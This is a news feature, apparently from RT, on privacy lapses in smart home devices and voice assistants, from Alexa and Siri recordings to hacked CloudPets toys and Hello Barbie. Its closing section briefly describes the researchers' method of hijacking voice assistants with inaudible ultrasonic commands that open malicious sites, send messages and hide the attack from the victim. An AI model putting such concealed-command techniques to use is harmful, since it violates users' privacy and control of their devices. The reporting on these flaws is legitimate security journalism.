The expansion of home tech products to make life increasingly convenient requires consumer privacy sacrifices, the full extent of which won’t be revealed for years to come, but have been hinted at through a slew of missteps.

This past week Amazon hit headlines after its virtual assistant Alexa was caught passively recording couples arguing, having intimate family discussions and even having sex (apparently sex noises can trigger Alexa-activated Echo speakers).

Also on rt.com Outsourced spying: Google admits ‘language experts’ listen to ‘some’ assistant recordings

Data is the new dominant commodity of the 21st century and the trade-off of convenience for privacy and security has been highlighted in a plethora of cases involving consumer ‘smart products’ in recent years.

Amazon Echo as murder witness?

Take the November 2015 case of James Bates, who was suspected of the murder of his friend Victor Collins at a house party in his home. Police issued multiple search warrants to Amazon in the landmark case, in an attempt to gain access to the records of Bates’ Echo device.

“I have a problem that a Christmas gift that is supposed to better your life can be used against you,” Bates’s attorney, Kimberly Weber, said at the time. Eventually, Bates himself decided to turn over the data, foregoing his right to privacy in the interest of proving his innocence and clearing his name.

Also on rt.com Amazon admits it keeps some Alexa recordings even when users delete them

Siri’s sensitive recordings

Much like Amazon, Apple has been found surreptitiously recording users’ sexual encounters, drug deals and medical appointments, though more worryingly, these audio recordings were sent to human ‘graders’ for evaluation, according to recent, explosive revelations from a whistleblower.

Also on rt.com Siri ‘regularly’ records sex encounters, sends ‘countless’ private moments to Apple contractors

Apple’s virtual assistant Siri stores users’ identifiable utterances for up to six months, before removing the unique user ID information and storing the clips elsewhere for up to two years – in the interest of improved customer experience, of course.

Google Mini & passive spying

Google’s domestic virtual assistant Google Mini has also been caught passively spying on consumers in their own homes. Worryingly, however, Google employs hundreds of so-called “language experts” to parse snippets of audio, some of which contain embarrassing or sensitive information, to better understand the nuances of human language.

In 2017, writer Artem Russakovskii went to the product’s unveiling at the SFJazz Center in San Francisco. After a couple of days he checked his voice activity log to find thousands of inadvertent entries that should never have been logged; the device had been spying on him 24/7 due to an apparent ‘hardware flaw’, as the company claimed at the time.

Hacking tech teddies

The idea for a teddy bear that allowed parents and children to share affection when long distances apart was good in theory, but ultimately proved terrifying in practice.

Also on rt.com ‘Smart’ Teddy bears hacked, 2mn private recordings leaked, children at risk

Through Cloudpets (and various other interpretations of the idea), children could record short messages for loved ones far away that would be transmitted via bluetooth to a nearby smartphone and beamed across the country or, indeed, the world.

Alas, it didn’t take long before data belonging to some 800,000 customers, totalling roughly two million messages between children and adults, which were stored in an online database, was hacked and held for ransom.

There was no encryption or authentication between the bluetooth devices in the stuffed animals and the smartphone app, meaning unscrupulous actors could invade people’s most heartfelt moments with their children.

Backdoor Barbie

Mattel's ‘Hello Barbie’ was billed as the world’s first “interactive doll” complete with a microphone that records children and sends the messages to third parties for processing before a response is generated.

However, security researchers quickly discovered that the wifi-connected doll was vulnerable to hacking, and those with the relevant knowhow could access the doll's system information, account information, stored data including audio files, and the doll’s built-in microphone.

Researcher Matt Jakubowski claimed that it was “just a matter of time until we are able to replace their servers with ours and have her say anything we want.”

But the ghoulish details didn't stop there; hackers could theoretically take over a home's wifi network via the doll and gain access to other connected devices such as laptops and phones, allowing them to pilfer a wealth of personal and financial information.

High-tech takeover

White hat hacking work by a team of researchers at China’s Zhejiang University showed how inaudible “commands” could be used to remotely trigger a potential victim's smart device. The team used various clever strategies, including playing frequencies above 20kHz as the victim was recording, rendering the inaudible frequency as a trigger to access the device.

The researchers managed to hack the voice interfaces of Amazon, Apple, Google, Microsoft and Samsung devices and command them to, for example, visit specific malicious websites or even send emails and text messages all while dimming the screen and lowering the device volume to conceal the attack, leaving the victim completely unaware.

The team even managed to remotely place phone and video calls to listen in and observe the victim’s surroundings. They infamously also managed to hack the navigation system of an Audi SUV.

Think your friends would be interested? Share this story!